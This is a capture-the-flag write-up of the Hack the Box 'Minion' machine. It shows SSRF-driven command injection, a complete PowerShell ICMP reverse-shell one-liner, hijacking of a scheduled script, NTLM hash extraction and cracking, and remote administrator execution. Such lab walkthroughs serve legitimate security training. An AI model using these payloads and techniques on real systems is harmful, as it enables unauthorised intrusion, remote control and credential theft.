htb-minion-nl

Today we are going to solve another CTF challenge “Minion” which is available online for those who want to increase their skill in penetration testing and black box testing. Minion is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of Minion is 10.10.10.57 so let’s begin with nmap port enumeration.

root@kali:~/htb/minion# nmap -sV -p- 10.10.10.57
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-31 15:44 CET
Nmap scan report for 10.10.10.57
Host is up (0.027s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
62696/tcp open http Microsoft IIS httpd 8.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 842.77 seconds

We don’t find anything on the webpage, so we run dirb to enumerate the directories. As the target machine is running Microsoft IIS server we try to find .asp file.

root@kali:~/htb/minion# dirb http://10.10.10.57:62696 -X .asp

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Thu Jan 31 16:10:15 2019
URL_BASE: http://10.10.10.57:62696/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.asp) | (.asp) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.57:62696/ ----
+ http://10.10.10.57:62696/test.asp (CODE:200|SIZE:41) 

-----------------
END_TIME: Thu Jan 31 16:12:29 2019
DOWNLOADED: 4612 - FOUND: 1

After enumerating this system, we find that this page is vulnerable to SSRF. So when we try access localhost we find a link called system commands.

As we are not directly accessing the page, we take a look at the source code and find the link to system command.

We open it using SSRF and find a form that can be used to execute our commands.

When we try to execute a command we are unable to. So we take a look at the source code of the page and find the parameter that is being used to pass the command we type.

After finding the parameter we use it pass our command and we find that we only get a response in terms of Exit Status. Exit Status = 1 for successful and Exit Status = 0 in case of errors.

Now when we try to get a reverse shell we are unable to, it is possible that TCP and UDP packets are blocked. So we ping ourselves using this RCE vulnerability to check if ICMP packet is allowed.

Hmmmm… The method is POST and the parameter is named “xcmd”. Nevertheless, let’s make an experiment. We are going to use the GET method and pass the xcmd parameter via the URL. We will set the xcmd = ping 10.10.14.15:

On our side, let’s see if we capture any pings coming from MINION (10.10.10.57):

Getting shell

It’s time for us to get a shell. On our side we can run icmpsh_m.py from https://github.com/inquisb/icmpsh and on MINION we can send this payload: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1
The problem is that if we try to send this payload via the xcmd paremeter some symbols are getting filtered (“+”, “&”, “/”) and there is also a size limit. We can double url-encode the special symbols to pass them through. We can also use multiple “echo >>” commands to write a ps1 script file and indeed many guys followed that path. But Alamot wrote his -very compact- one-liner payload without using any “+”,”&” symbols:

$ip = 'LHOST'; $id = 'UNIQUEID'; $ic = New-Object System.Net.NetworkInformation.Ping; $po = New-Object System.Net.NetworkInformation.PingOptions; $po.DontFragment=$true; function s($b) { $ic.Send($ip,5000,([text.encoding]::ASCII).GetBytes($b),$po) }; function p { -join($id,'[P$] ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ') }; while ($true) { $r = s(p); if (!$r.Buffer) { continue; }; $rs = ([text.encoding]::ASCII).GetString($r.Buffer);  if ($rs.Substring(0,8) -ne $id) { exit }; try { $rt = (iex -Command $rs.Substring(8) | Out-String); } catch { $rt = ($_.Exception|out-string) }; $i=0; while ($i -lt $rt.length-110) { s(-join($id,$rt.Substring($i,110))); $i -= -110; }; s(-join($id,$rt.Substring($i))); }

You can see he did some tricks like using $i -= -110 instead of $i += 110 etc. Thescript has a feature of unique ids, because -when using the ICMP protocol- things can get quite messy if multiple payloads are running simultaneously. You can download his script from here: https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Minion/icmp_alamot.py

Now, let’s get a shell (don’t forget to change LHOST inside the script):

root@kali:~/htb# python icmp_alamot.py 
Sending powershell ICMP payload [UID=84444eaf] and waiting for shell...
[P$] iis apppool\defaultapppool@MINION inetsrv> dir c:\


Directory: C:\


Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
d---- 9/4/2017 7:42 PM accesslogs 
d---- 8/10/2017 10:43 AM inetpub 
d---- 8/22/2013 8:52 AM PerfLogs 
d-r-- 9/25/2017 1:51 AM Program Files 
d---- 8/10/2017 9:42 AM Program Files (x86) 
d---- 8/24/2017 1:28 AM sysadmscripts 
d---- 9/16/2017 2:41 AM temp 
d-r-- 9/4/2017 7:41 PM Users 
d---- 9/10/2017 10:20 AM Windows


[P$] iis apppool\defaultapppool@MINION inetsrv>

The folder sysadmscripts seems interesting:

We go to root directory and find two files called “c.ps1” and “del_logs.bat”.

We take a look at the content of the file, and find that c.ps1 writes something inside a file that is passed as its argument. In “del_logs.bat” file it creates logs inside log.txt inside c:\windows\temp\ directory and find that the time is changed every 5 minutes.

Let’s examine the permissions in the sysadmscripts folder:

[P$] apppool\defaultapppool@MINION sysadmscripts> ls | get-acl | fl

Path   : Microsoft.PowerShell.Core\FileSystem::C:\sysadmscripts\c.ps1
Owner  : BUILTIN\Administrators
Group  : MINION\None
Access : Everyone Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  FullControl
Audit  : 
Sddl   : O:BAG:S-1-5-21-2506507270-770315343-2455145413-513D:PAI(A;;FA;;;WD)(A;
         ;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;BU)

Path   : Microsoft.PowerShell.Core\FileSystem::C:\sysadmscripts\del_logs.bat
Owner  : BUILTIN\Administrators
Group  : MINION\None
Access : Everyone Allow  ReadAndExecute, Synchronize
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
Audit  : 
Sddl   : O:BAG:S-1-5-21-2506507270-770315343-2455145413-513D:PAI(A;;0x1200a9;;;
         WD)(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;BU)

User decoder runs the script c.ps1 every 5 minutes and we can overwrite it with our own payload.

Now we change the original c.ps1 with our file, so that we can try and get the user.txt and root.txt.

[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "dir c:\users\administrator\Desktop > c:\temp\output.txt" > c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "dir c:\users\decoder.MINION\Desktop >> c:\temp\output.txt" >> c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "copy c:\users\administrator\Desktop\root.txt c:\temp\root.txt" >> c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "copy c:\users\decoder.MINION\Desktop\* c:\temp\" >> c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> (Get-Content c:\temp\test.ps1) | ForEach-Object { $_ -replace """", "" } | Set-Content c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> copy c:\sysadmscripts\c.ps1 c:\temp\c.ps1.bak
[P$] iis apppool\defaultapppool@MINION sysadmscripts> copy c:\temp\test.ps1 c:\sysadmscripts\c.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> cd c:\temp
[P$] iis apppool\defaultapppool@MINION temp> dir


Directory: C:\temp


Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a--- 9/4/2017 7:19 PM 103297 backup.zip 
-a--- 9/26/2017 6:24 AM 284 c.ps1.bak 
-a--- 1/31/2019 6:01 AM 770 output.txt 
-a--- 1/31/2019 5:59 AM 228 test.ps1 
-a--- 8/25/2017 11:09 AM 33 user.txt


[P$] iis apppool\defaultapppool@MINION temp> type user.txt
40b******601
[P$] iis apppool\defaultapppool@MINION temp> get-content c:\temp\backup.zip -str pass
28a5d1e0c15af9f8fce7db65d75bbf17
-> We decode the NTLM hash using hashkiller.co.uk and find the password to be 1234test

[P$] iis apppool\defaultapppool@MINION temp> net use * \\minion\c$ /user:minion\administrator 1234test
Drive Z: is now connected to \\minion\c$.

The command completed successfully.

[P$] iis apppool\defaultapppool@MINION temp> z:
[P$] iis apppool\defaultapppool@MINION Z:\> dir


Directory: Z:\


Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
d---- 9/4/2017 7:42 PM accesslogs 
d---- 8/10/2017 10:43 AM inetpub 
d---- 8/22/2013 8:52 AM PerfLogs 
d-r-- 9/25/2017 1:51 AM Program Files 
d---- 8/10/2017 9:42 AM Program Files (x86) 
d---- 8/24/2017 1:28 AM sysadmscripts 
d---- 1/31/2019 6:01 AM temp 
d-r-- 9/4/2017 7:41 PM Users 
d---- 9/10/2017 10:20 AM Windows


[P$] iis apppool\defaultapppool@MINION Z:\> cd users
[P$] iis apppool\defaultapppool@MINION users> cd administrator
[P$] iis apppool\defaultapppool@MINION administrator> cd desktop
[P$] iis apppool\defaultapppool@MINION desktop> 


Directory: Z:\users\administrator\desktop


Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a--- 9/26/2017 6:18 AM 386479 root.exe 
-a--- 8/24/2017 12:32 AM 76 root.txt


[P$] iis apppool\defaultapppool@MINION desktop> type root.txt
In order to get the flag you have to launch root.exe located in this folder!

We wait for few minutes for the powershell script to get executed and find that we were able to successfully able to extract “user.txt”. Before looking in the zip backup file, we take a look at the content of “output.txt” and find that the file was in “c:\users\decoder.MINION\Desktop” directory.

c:\PENTEST\HASHCAT>hashcat32 -h | findstr NTLM
   5500 | NetNTLMv1                                        | Network Protocols
   5500 | NetNTLMv1+ESS                                    | Network Protocols
   5600 | NetNTLMv2                                        | Network Protocols
   1000 | NTLM                                             | Operating Systems
c:\PENTEST\HASHCAT>hashcat32 -a0 -m 1000 28a5d1e0c15af9f8fce7db65d75bbf17 e:\oscp\rockyou.txt --force --show
28a5d1e0c15af9f8fce7db65d75bbf17:1234test

We try to run root.exe but are unable to get a flag because we are not Administrator yet.

[P$] iis apppool\defaultapppool@MINION desktop> $user = '.\administrator';$psw = '1234test';$secpsw= ConvertTo-SecureString $psw -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $user, $secpsw
[P$] iis apppool\defaultapppool@MINION desktop> invoke-command -computername localhost -credential $credential -scriptblock {cd C:\Users\Administrator\Desktop\;C:\Users\Administrator\Desktop\root.exe}
25a*****cf1

Adding a firewall rule ( as Administrator )

[P$] iis apppool\defaultapppool@MINION desktop> $user = '.\administrator';$psw = '1234test';$secpsw= ConvertTo-SecureString $psw -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $user, $secpsw [P$] iis apppool\defaultapppool@MINION desktop> invoke-command -computername localhost -credential $credential -scriptblock {New-NetFirewallRule - DisplayName puckie -RemoteAddress 10.10.14.15 -Direction inbound -Action Allow}

Author: Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *